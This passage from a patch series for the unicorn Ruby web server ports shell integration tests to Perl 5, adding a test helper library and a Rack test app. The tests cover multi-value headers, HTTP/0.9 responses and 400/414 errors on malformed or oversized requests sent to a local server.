diff --git a/GNUmakefile b/GNUmakefile
index 0e08ef0..5cca189 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -86,7 +86,7 @@ $(tmp_bin)/%: bin/% | $(tmp_bin)
 bins: $(tmp_bins)
 
 t_log := $(T_log) $(T_n_log)
-test: $(T) $(T_n)
+test: $(T) $(T_n) test-prove
 	@cat $(t_log) | $(MRI) test/aggregate.rb
 	@$(RM) $(t_log)
 
@@ -141,6 +141,9 @@ t/random_blob:
 
 test-integration: $(T_sh)
 
+test-prove:
+	prove -vw
+
 check: test-require test test-integration
 test-all: check
 
diff --git a/t/README b/t/README
index 14de559..8a5243e 100644
--- a/t/README
+++ b/t/README
@@ -5,16 +5,24 @@ TCP ports or Unix domain sockets.  They're all designed to run
 concurrently with other tests to minimize test time, but tests may be
 run independently as well.
 
-We write our tests in Bourne shell because that's what we're
-comfortable writing integration tests with.
+New tests are written in Perl 5 because we need a stable language
+to test real-world behavior and Ruby introduces incompatibilities
+at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
+it should be easy-to-learn for Rubyists.
+
+Old tests are in Bourne shell, but the socat(1) dependency was probably
+too rare compared to Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/] (duh!)
+* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
+
+The following requirements will eventually be dropped.
+
 * {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
-* standard UNIX shell utilities (Bourne sh, awk, sed, grep, ...)
 
 We do not use bashisms or any non-portable, non-POSIX constructs
 in our shell code.  We use the "pipefail" option if available and
@@ -26,9 +34,13 @@ with {dash}[http://gondor.apana.org.au/~herbert/dash/] and
 
 To run the entire test suite with 8 tests running at once:
 
-  make -j8
+  make -j8 && prove -vw
+
+To run one individual test (Perl5):
+
+  prove -vw t/integration.t
 
-To run one individual test:
+To run one individual test (shell):
 
   make t0000-simple-http.sh
 
diff --git a/t/integration.ru b/t/integration.ru
new file mode 100644
index 0000000..6ef873c
--- /dev/null
+++ b/t/integration.ru
@@ -0,0 +1,38 @@
+#!ruby
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+# this goes for t/integration.t  We'll try to put as many tests
+# in here as possible to avoid startup overhead of Ruby.
+
+$orig_rack_200 = nil
+def tweak_status_code
+  $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
+  Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
+  [ 200, {}, [] ]
+end
+
+def restore_status_code
+  $orig_rack_200 or return [ 500, {}, [] ]
+  Rack::Utils::HTTP_STATUS_CODES[200] = $orig_rack_200
+  [ 200, {}, [] ]
+end
+
+run(lambda do |env|
+  case env['REQUEST_METHOD']
+  when 'GET'
+    case env['PATH_INFO']
+    when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
+    when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    end # case PATH_INFO (GET)
+  when 'POST'
+    case env['PATH_INFO']
+    when '/tweak-status-code'; tweak_status_code
+    when '/restore-status-code'; restore_status_code
+    end # case PATH_INFO (POST)
+    # ...
+  when 'PUT'
+    # ...
+  end # case REQUEST_METHOD
+end) # run
diff --git a/t/integration.t b/t/integration.t
new file mode 100644
index 0000000..5569155
--- /dev/null
+++ b/t/integration.t
@@ -0,0 +1,64 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+my $srv = tcp_server();
+my $t0 = time;
+my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
+my ($c, $status, $hdr);
+
+# response header tests
+$c = tcp_connect($srv);
+print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+my $orig_200_status = $status;
+is_deeply([ grep(/^X-R2: /, @$hdr) ],
+	[ 'X-R2: a', 'X-R2: b', 'X-R2: c' ],
+	'rack 2 LF-delimited headers supported') or diag(explain($hdr));
+
+SKIP: { # Date header check
+	my @d = grep(/^Date: /i, @$hdr);
+	is(scalar(@d), 1, 'got one date header') or diag(explain(\@d));
+	eval { require HTTP::Date } or skip "HTTP::Date missing: $@", 1;
+	$d[0] =~ s/^Date: //i or die 'BUG: did not strip date: prefix';
+	my $t = HTTP::Date::str2time($d[0]);
+	ok($t >= $t0 && $t > 0 && $t <= time, 'valid date') or
+		diag(explain([$t, $!, \@d]));
+};
+
+# cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
+$c = tcp_connect($srv);
+print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
+	'nil header value accepted for broken apps') or diag(explain($hdr));
+
+if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
+	$c = tcp_connect($srv);
+	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
+
+	$c = tcp_connect($srv);
+	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	is($status, $orig_200_status, 'original status restored');
+}
+
+
+# ... more stuff here
+undef $ar;
+diag slurp("$tmpdir/err.log") if $ENV{V};
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
new file mode 100644
index 0000000..dd9c6b7
--- /dev/null
+++ b/t/lib.perl
@@ -0,0 +1,189 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+package UnicornTest;
+use v5.14;
+use parent qw(Exporter);
+use Test::More;
+use IO::Socket::INET;
+use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
+use File::Temp 0.19 (); # 0.19 for ->newdir
+our ($tmpdir, $errfh);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
+	SEEK_SET);
+
+my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
+$tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+
+sub tcp_server {
+	my %opt = (
+		ReuseAddr => 1,
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		Listen => SOMAXCONN,
+		Blocking => 0,
+		@_,
+	);
+	eval {
+		die 'IPv4-only' if $ENV{TEST_IPV4_ONLY};
+		require IO::Socket::INET6;
+		IO::Socket::INET6->new(%opt, LocalAddr => '[::1]')
+	} || eval {
+		die 'IPv6-only' if $ENV{TEST_IPV6_ONLY};
+		IO::Socket::INET->new(%opt, LocalAddr => '127.0.0.1')
+	} || BAIL_OUT "failed to create TCP server: $! ($@)";
+}
+
+sub tcp_host_port {
+	my ($s) = @_;
+	my ($h, $p) = ($s->sockhost, $s->sockport);
+	my $ipv4 = $s->sockdomain == AF_INET;
+	if (wantarray) {
+		$ipv4 ? ($h, $p) : ("[$h]", $p);
+	} else {
+		$ipv4 ? "$h:$p" : "[$h]:$p";
+	}
+}
+
+sub tcp_connect {
+	my ($dest, %opt) = @_;
+	my $addr = tcp_host_port($dest);
+	my $s = ref($dest)->new(
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		PeerAddr => $addr,
+		%opt,
+	) or BAIL_OUT "failed to connect to $addr: $!";
+	$s->autoflush(1);
+	$s;
+}
+
+sub slurp {
+	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	local $/;
+	<$fh>;
+}
+
+sub spawn {
+	my $env = ref($_[0]) eq 'HASH' ? shift : undef;
+	my $opt = ref($_[-1]) eq 'HASH' ? pop : {};
+	my @cmd = @_;
+	my $old = POSIX::SigSet->new;
+	my $set = POSIX::SigSet->new;
+	$set->fillset or die "sigfillset: $!";
+	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
+	pipe(my ($r, $w)) or die "pipe: $!";
+	my $pid = fork // die "fork: $!";
+	if ($pid == 0) {
+		close $r;
+		$SIG{__DIE__} = sub {
+			warn(@_);
+			syswrite($w, my $num = $! + 0);
+			_exit(1);
+		};
+
+		# pretend to be systemd (cf. sd_listen_fds(3))
+		my $cfd;
+		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
+			my $io = $opt->{$cfd} // next;
+			my $pfd = fileno($io) // die "fileno($io): $!";
+			if ($pfd == $cfd) {
+				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+			} else {
+				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
+			}
+		}
+		if (($cfd - 3) > 0) {
+			$env->{LISTEN_PID} = $$;
+			$env->{LISTEN_FDS} = $cfd - 3;
+		}
+
+		if (defined(my $pgid = $opt->{pgid})) {
+			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
+		}
+		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
+		if (defined(my $cd = $opt->{-C})) {
+			chdir $cd // die "chdir($cd): $!";
+		}
+		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
+		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
+		@ENV{keys %$env} = values(%$env) if $env;
+		exec { $cmd[0] } @cmd;
+		die "exec @cmd: $!";
+	}
+	close $w;
+	sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK(old): $!";
+	if (my $cerrnum = do { local $/, <$r> }) {
+		$! = $cerrnum;
+		die "@cmd PID=$pid died: $!";
+	}
+	$pid;
+}
+
+sub which {
+	my ($file) = @_;
+	return $file if index($file, '/') >= 0;
+	for my $p (split(/:/, $ENV{PATH})) {
+		$p .= "/$file";
+		return $p if -x $p;
+	}
+	undef;
+}
+
+# returns an AutoReap object
+sub unicorn {
+	my %env;
+	if (ref($_[0]) eq 'HASH') {
+		my $e = shift;
+		%env = %$e;
+	}
+	my @args = @_;
+	push(@args, {}) if ref($args[-1]) ne 'HASH';
+	$args[-1]->{2} //= $errfh; # stderr default
+
+	state $ruby = which($ENV{RUBY} // 'ruby');
+	state $lib = File::Spec->rel2abs('lib');
+	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
+	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
+	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
+	state $exe = File::Spec->rel2abs('bin/unicorn');
+	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
+	UnicornTest::AutoReap->new($pid);
+}
+
+# automatically kill + reap children when this goes out-of-scope
+package UnicornTest::AutoReap;
+use v5.14;
+
+sub new {
+	my (undef, $pid) = @_;
+	bless { pid => $pid, owner => $$ }, __PACKAGE__
+}
+
+sub kill {
+	my ($self, $sig) = @_;
+	CORE::kill($sig // 'TERM', $self->{pid});
+}
+
+sub join {
+	my ($self, $sig) = @_;
+	my $pid = delete $self->{pid} or return;
+	CORE::kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	$ret == $pid or die "BUG: waitpid($pid) != $ret";
+}
+
+sub DESTROY {
+	my ($self) = @_;
+	return if $self->{owner} != $$;
+	$self->join('TERM');
+}
+
+package main; # inject ourselves into the t/*.t script
+UnicornTest->import;
+Test::More->import;
+# try to ensure ->DESTROY fires:
+$SIG{TERM} = sub { exit(15 + 128) };
+$SIG{INT} = sub { exit(2 + 128) };
+1;
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
deleted file mode 100644
index fbe433f..0000000
--- a/test/unit/test_response.rb
+++ /dev/null
@@ -1,111 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2005 Zed A. Shaw
-# You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv2+ (GPLv3+ preferred)
-#
-# Additional work donated by contributors.  See git history
-# for more information.
-
-require './test/test_helper'
-require 'time'
-
-include Unicorn
-
-class ResponseTest < Test::Unit::TestCase
-  include Unicorn::HttpResponse
-
-  def test_httpdate
-    before = Time.now.to_i - 1
-    str = httpdate
-    assert_kind_of(String, str)
-    middle = Time.parse(str).to_i
-    after = Time.now.to_i
-    assert before <= middle
-    assert middle <= after
-  end
-
-  def test_response_headers
-    out = StringIO.new
-    http_response_write(out, 200, {"X-Whatever" => "stuff"}, ["cool"])
-    assert ! out.closed?
-
-    assert out.length > 0, "output didn't have data"
-  end
-
-  # ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-  def test_response_header_broken_nil
-    out = StringIO.new
-    http_response_write(out, 200, {"Nil" => nil}, %w(hysterical raisin))
-    assert ! out.closed?
-
-    assert_match %r{^Nil: \r\n}sm, out.string, 'nil accepted'
-  end
-
-  def test_response_string_status
-    out = StringIO.new
-    http_response_write(out,'200', {}, [])
-    assert ! out.closed?
-    assert out.length > 0, "output didn't have data"
-  end
-
-  def test_response_200
-    io = StringIO.new
-    http_response_write(io, 200, {}, [])
-    assert ! io.closed?
-    assert io.length > 0, "output didn't have data"
-  end
-
-  def test_response_with_default_reason
-    code = 400
-    io = StringIO.new
-    http_response_write(io, code, {}, [])
-    assert ! io.closed?
-    lines = io.string.split(/\r\n/)
-    assert_match(/.* Bad Request$/, lines.first,
-                 "wrong default reason phrase")
-  end
-
-  def test_rack_multivalue_headers
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff\nbleh"}, [])
-    assert ! out.closed?
-    assert_match(/^X-Whatever: stuff\r\nX-Whatever: bleh\r\n/, out.string)
-  end
-
-  # Even though Rack explicitly forbids "Status" in the header hash,
-  # some broken clients still rely on it
-  def test_status_header_added
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff"}, [])
-    assert ! out.closed?
-  end
-
-  def test_unknown_status_pass_through
-    out = StringIO.new
-    http_response_write(out,"666 I AM THE BEAST", {}, [] )
-    assert ! out.closed?
-    headers = out.string.split(/\r\n\r\n/).first.split(/\r\n/)
-    assert %r{\AHTTP/\d\.\d 666 I AM THE BEAST\z}.match(headers[0])
-  end
-
-  def test_modified_rack_http_status_codes_late
-    r, w = IO.pipe
-    pid = fork do
-      r.close
-      # Users may want to globally override the status text associated
-      # with an HTTP status code in their app.
-      Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
-      http_response_write(w, 200, {}, [])
-      w.close
-    end
-    w.close
-    assert_equal "HTTP/1.1 200 HI\r\n", r.gets
-    r.read # just drain the pipe
-    pid, status = Process.waitpid2(pid)
-    assert status.success?, status.inspect
-  ensure
-    r.close
-    w.close unless w.closed?
-  end
-end

[-- Attachment #3: 0002-support-rack-3-multi-value-headers.patch --]
[-- Type: text/x-diff, Size: 1710 bytes --]

From ea0559c700fa029044464de4bd572662c10b7273 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:31 +0000
Subject: [PATCH 02/23] support rack 3 multi-value headers

The first step in adding Rack 3 support.  Rack supports
multi-value headers via array rather than newlines.

Tested-by: Martin Posthumus <martin.posthumus@gmail.com>
Link: https://yhbt.net/unicorn-public/7c851d8a-bc57-7df8-3240-2f5ab831c47c@gmail.com/
---
 t/integration.ru | 1 +
 t/integration.t  | 9 +++++++++
 2 files changed, 10 insertions(+)

diff --git a/t/integration.ru b/t/integration.ru
index 6ef873c..5183217 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -23,6 +23,7 @@ def restore_status_code
   when 'GET'
     case env['PATH_INFO']
     when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     end # case PATH_INFO (GET)
diff --git a/t/integration.t b/t/integration.t
index 5569155..e876c71 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -38,6 +38,15 @@ SKIP: { # Date header check
 		diag(explain([$t, $!, \@d]));
 };
 
+
+$c = tcp_connect($srv);
+print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([ grep(/^x-r3: /, @$hdr) ],
+	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
+	'rack 3 array headers supported') or diag(explain($hdr));
+
+
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
 print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;

[-- Attachment #4: 0003-port-t0018-write-on-close.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4091 bytes --]

From 295a6c616f8840bc04617a377c04c3422aeebddc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:32 +0000
Subject: [PATCH 03/23] port t0018-write-on-close.sh to Perl 5

This doesn't require restarting, so it's a perfect candidate.
---
 t/integration.ru          | 15 +++++++++++++++
 t/integration.t           | 14 +++++++++++++-
 t/lib.perl                |  2 +-
 t/t0018-write-on-close.sh | 23 -----------------------
 t/write-on-close.ru       | 11 -----------
 5 files changed, 29 insertions(+), 36 deletions(-)
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100644 t/write-on-close.ru

diff --git a/t/integration.ru b/t/integration.ru
index 5183217..12f5d48 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -18,6 +18,20 @@ def restore_status_code
   [ 200, {}, [] ]
 end
 
+class WriteOnClose
+  def each(&block)
+    @callback = block
+  end
+
+  def close
+    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
+  end
+end
+
+def write_on_close
+  [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -26,6 +40,7 @@ def restore_status_code
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index e876c71..3ab5c90 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -4,6 +4,7 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
 
@@ -66,8 +67,19 @@ if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
 	is($status, $orig_200_status, 'original status restored');
 }
 
+SKIP: {
+	eval { require HTTP::Tiny } or skip "HTTP::Tiny missing: $@", 1;
+	my $ht = HTTP::Tiny->new;
+	my $res = $ht->get("http://$host_port/write_on_close");
+	is($res->{content}, 'Goodbye', 'write-on-close body read');
+}
 
 # ... more stuff here
 undef $ar;
-diag slurp("$tmpdir/err.log") if $ENV{V};
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+is_deeply(\@err, [], 'no unexpected errors in stderr');
+is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index dd9c6b7..12deaf8 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET);
+	SEEK_SET tcp_host_port);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
diff --git a/t/t0018-write-on-close.sh b/t/t0018-write-on-close.sh
deleted file mode 100755
index 3afefea..0000000
--- a/t/t0018-write-on-close.sh
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 4 "write-on-close tests for funky response-bodies"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config write-on-close.ru
-	unicorn_wait_start
-}
-
-t_begin "write-on-close response body succeeds" && {
-	test xGoodbye = x"$(curl -sSf http://$listen/)"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done
diff --git a/t/write-on-close.ru b/t/write-on-close.ru
deleted file mode 100644
index 725c4d6..0000000
--- a/t/write-on-close.ru
+++ /dev/null
@@ -1,11 +0,0 @@
-class WriteOnClose
-  def each(&block)
-    @callback = block
-  end
-
-  def close
-    @callback.call "7\r\nGoodbye\r\n0\r\n\r\n"
-  end
-end
-use Rack::ContentType, "text/plain"
-run(lambda { |_| [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ] })

[-- Attachment #5: 0004-port-t0000-http-basic.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3372 bytes --]

From 1bb4362cee167ac7aeec910d3f52419e391f1e61 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:33 +0000
Subject: [PATCH 04/23] port t0000-http-basic.sh to Perl 5

One more socat dependency down...
---
 t/integration.ru      | 16 ++++++++++++++
 t/integration.t       | 11 ++++++++++
 t/t0000-http-basic.sh | 50 -------------------------------------------
 3 files changed, 27 insertions(+), 50 deletions(-)
 delete mode 100755 t/t0000-http-basic.sh

diff --git a/t/integration.ru b/t/integration.ru
index 12f5d48..c0bef99 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -32,6 +32,21 @@ def write_on_close
   [ 200, { 'transfer-encoding' => 'chunked' }, WriteOnClose.new ]
 end
 
+def env_dump(env)
+  require 'json'
+  h = {}
+  env.each do |k,v|
+    case v
+    when String, Integer, true, false; h[k] = v
+    else
+      case k
+      when 'rack.version', 'rack.after_reply'; h[k] = v
+      end
+    end
+  end
+  h.to_json
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -40,6 +55,7 @@ def write_on_close
     when '/rack-3-array-headers'; [ 200, { 'x-r3' => %w(a b c) }, [] ]
     when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3ab5c90..ee22e7e 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -47,6 +47,17 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
 	'rack 3 array headers supported') or diag(explain($hdr));
 
+SKIP: {
+	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
+	$c = tcp_connect($srv);
+	print $c "GET /env_dump\r\n" or die $!;
+	my $json = do { local $/; readline($c) };
+	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
+	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
+	my $env = JSON::PP->new->decode($json);
+	is(ref($env), 'HASH', 'JSON decoded body to hashref');
+	is($env->{SERVER_PROTOCOL}, 'HTTP/0.9', 'SERVER_PROTOCOL is 0.9');
+}
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
 $c = tcp_connect($srv);
diff --git a/t/t0000-http-basic.sh b/t/t0000-http-basic.sh
deleted file mode 100755
index 8ab58ac..0000000
--- a/t/t0000-http-basic.sh
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 8 "simple HTTP connection tests"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "single request" && {
-	curl -sSfv http://$listen/
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_begin "HTTP/0.9 request should not return headers" && {
-	(
-		printf 'GET /\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-}
-
-t_begin "env.inspect should've put everything on one line" && {
-	test 1 -eq $(count_lines < $tmp)
-}
-
-t_begin "no headers in output" && {
-	if grep ^Connection: $tmp
-	then
-		die "Connection header found in $tmp"
-	elif grep ^HTTP/ $tmp
-	then
-		die "HTTP/ found in $tmp"
-	fi
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr has no errors" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #6: 0005-port-t0002-parser-error.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4875 bytes --]

From 2eb7b1662c291ab535ee5dabf5d96194ca6483d4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:34 +0000
Subject: [PATCH 05/23] port t0002-parser-error.sh to Perl 5

Another socat dependency down...
---
 t/integration.t         | 33 +++++++++++++++
 t/lib.perl              |  9 +++-
 t/t0002-parser-error.sh | 94 -----------------------------------------
 3 files changed, 41 insertions(+), 95 deletions(-)
 delete mode 100755 t/t0002-parser-error.sh

diff --git a/t/integration.t b/t/integration.t
index ee22e7e..503b7eb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -85,6 +85,39 @@ SKIP: {
 	is($res->{content}, 'Goodbye', 'write-on-close body read');
 }
 
+if ('bad requests') {
+	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /' or die $!;
+	my $buf = join('', (0..9), 'ab');
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on REQUEST_PATH > (12 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world?a' or die $!;
+	$buf = join('', (0..9));
+	for (0..1023) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!,
+		'414 on QUERY_STRING > (10 * 1024)');
+
+	$c = tcp_connect($srv);
+	print $c 'GET /hello-world#a' or die $!;
+	$buf = join('', (0..9), 'a'..'f');
+	for (0..63) { print $c $buf or die $! }
+	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
+}
+
+
 # ... more stuff here
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
diff --git a/t/lib.perl b/t/lib.perl
index 12deaf8..7d712b5 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port);
+	SEEK_SET tcp_host_port start_req);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -59,6 +59,13 @@ sub tcp_connect {
 	$s;
 }
 
+sub start_req {
+	my ($srv, @req) = @_;
+	my $c = tcp_connect($srv);
+	print $c @req, "\r\n\r\n" or die "print: $!";
+	$c;
+}
+
 sub slurp {
 	open my $fh, '<', $_[0] or die "open($_[0]): $!";
 	local $/;
diff --git a/t/t0002-parser-error.sh b/t/t0002-parser-error.sh
deleted file mode 100755
index 9dc1cd2..0000000
--- a/t/t0002-parser-error.sh
+++ /dev/null
@@ -1,94 +0,0 @@
